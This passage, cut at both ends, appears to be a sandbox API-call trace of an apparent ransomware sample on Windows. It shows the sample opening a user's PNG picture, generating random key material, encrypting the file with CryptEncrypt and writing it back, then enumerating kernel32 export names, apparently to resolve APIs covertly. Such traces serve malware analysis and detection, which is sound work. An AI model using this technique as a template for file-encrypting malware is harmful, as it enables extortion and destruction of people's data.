(lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.119] lstrlenW (lpString="6pqbaFAB59 bjsw9TrUE.png") returned 24 [0086.119] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.119] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="6pqbaFAB59 bjsw9TrUE.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\6pqbaFAB59 bjsw9TrUE.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\6pqbaFAB59 bjsw9TrUE.png" [0086.119] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\6pqbaFAB59 bjsw9TrUE.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\6pqbafab59 bjsw9true.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.120] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=27037) returned 1 [0086.120] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.120] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.120] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.120] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.120] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.121] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.121] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.121] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.122] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.122] CloseHandle (hObject=0x42c) returned 1 [0086.122] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.122] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.123] CloseHandle (hObject=0x0) returned 0 [0086.123] CloseHandle (hObject=0x428) returned 1 [0086.123] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.123] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.124] GetTickCount () returned 0x114dfb5 [0086.124] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.124] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.124] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.124] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.124] lstrlenA (lpString="kernel32.dll") returned 12 [0086.125] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.125] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.125] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.125] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.125] lstrlenA (lpString="ADDATOMA") returned 8 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.125] lstrlenA (lpString="ADDATOMW") returned 8 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.125] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.125] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.125] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.125] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.125] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.125] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.125] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.125] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.125] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.125] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.125] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.125] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.126] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.126] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.126] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.126] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.126] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.126] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.126] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.126] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.126] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.126] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.126] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.126] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.126] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.126] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.126] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.126] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.126] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.126] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.126] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.127] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.127] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.127] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.127] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.127] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.127] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.127] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.127] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.127] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.127] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.127] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.127] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.127] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.127] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.127] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.127] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.127] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.127] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.127] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.127] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.128] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.128] lstrlenA (lpString="BEEP") returned 4 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.128] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.128] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.128] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.128] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.128] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.128] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.128] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.128] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.128] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.128] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.128] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.128] lstrlenA (lpString="CANCELIO") returned 8 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.128] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.128] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.128] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.128] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.128] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.129] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.129] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.129] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.129] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.129] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.129] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.129] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.129] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.129] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.129] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.129] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.129] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.129] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.129] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.129] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.129] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.129] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.129] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.129] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.130] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.130] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.130] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.130] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.130] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.130] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.130] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.130] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.130] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.130] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.130] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.130] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.130] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.130] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.130] lstrcpyA (in: 